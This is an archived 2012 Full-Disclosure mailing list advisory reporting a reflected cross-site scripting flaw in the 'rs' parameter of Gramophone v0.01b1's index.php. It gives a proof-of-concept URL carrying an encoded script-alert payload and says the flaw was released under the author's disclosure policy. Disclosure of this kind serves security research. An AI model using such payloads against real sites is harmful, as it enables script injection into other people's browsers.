| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 25 Oct 2012 08:32:10 -0400 From: Thomas Richards <g13net@...il.com> To: full-disclosure@...ts.grok.org.uk Subject: Gramophone v0.01b1 'rs' XSS # Exploit Title: Gramophone v0.01b1 'rs' XSS # Date: 10/25/12 # Author: G13 # Twitter: @g13net # Software Site: https://github.com/benbruscella/Gramophone # Version: 0.01b1 # Category: webapp (php) # ##### ToC ##### 0x01 Description 0x02 XSS 0x03 Vendor Notification ##### 0x01 Description ##### Gramophone is a music system used to catalog your music collection ##### 0x02 XSS ##### -----Vulnerability----- The 'rs' parameter on index.php is vulnerable to reflective cross site scripting -----PoC----- http://localhost/gramophone/index.php?rs=%3Cscript%3Ealert%281%29%3C/script%3E ##### 0x03 Vendor Notification ##### As per my policy, vulnerability has been released. http://www.g13net.com/vuln-disc.txt _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists